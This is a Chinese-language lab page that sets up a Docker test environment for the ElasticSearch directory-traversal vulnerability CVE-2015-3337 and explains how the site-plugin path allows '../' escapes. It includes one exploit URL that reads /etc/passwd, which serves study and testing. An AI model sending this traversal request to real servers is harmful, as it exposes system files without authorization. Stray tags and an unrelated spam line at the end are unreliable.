<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    ElasticSearch 目錄穿越漏洞(CVE-2015-3337)測試環境

    Path elasticsearch/CVE-2015-3337

    • jre版本:openjdk:8-jre

    • elasticsearch版本:v1.4.4

    影響版本:1.4.5以下/1.5.2以下

    原理

    在安裝了具有“site”功能的插件以后,插件目錄使用../即可向上跳轉,導致目錄穿越漏洞,可讀取任意文件。沒有安裝任意插件的elasticsearch不受影響。

    測試環境

    編譯及運行測試環境

    docker-compose build
    docker-compose up -d

    測試環境默認安裝了一個插件:elasticsearch-head,主頁在此:https://github.com/mobz/elasticsearch-head

    訪問http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd讀取任意文件(不要在瀏覽器訪問):

    head插件

    head插件提供了elasticsearch的前端頁面,訪問 http://your-ip:9200/_plugin/head/ 即可看到,不多說了。

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类